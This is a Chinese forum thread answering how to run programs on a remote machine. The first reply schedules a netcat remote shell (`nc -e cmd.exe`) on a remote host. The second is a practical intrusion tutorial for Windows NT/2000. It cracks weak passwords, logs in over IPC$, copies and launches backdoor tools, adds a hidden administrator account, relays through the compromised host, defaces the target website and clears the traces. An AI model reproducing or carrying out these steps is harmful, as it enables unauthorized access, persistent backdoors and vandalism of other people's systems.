怎么样在本地机器上使远程机器上的程序运行起来?

解决方案 »

  1.   

    at \\192.168.0.10 15:59 nc -l -p 1234 -t -e cmd.exe
      

  2.   

    简单入侵NT主机 
    我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)
    2、回到系统,在“命令提示符”下,IPC登录:
    net use \\ip\ipc$ "password" /user:username
    把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机
    copy srv.exe \\ip\admin$\system32
    copy ntlm.exe \\ip\admin$\system32net time \\ip #查看肉机当前时间
    at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事:
    c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345
    c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^)
    c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的)
    运行完NTLM.EXE 后,用EXIT 断开连接。回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务
    netsvc \\ip telnet /stop #关闭指定ip的telnet服务
    netsvc \\ip telnet /start #打开指定ip的telnet服务
    其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。
    现在登录:
    telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦)
    net use \\ip\ipc$ "password"/user:username
    net use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是
    c:\inetpub\wwwroot)
    把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。小结:以上的文章教了你用黑一个网站(由于网站管理员错误造成的)和如何做一个跳板。以后你可以用
    newboys这个账号登陆到那个肉机了(这可是你自己的跳板呀)。请不要拿国内主机进行试验。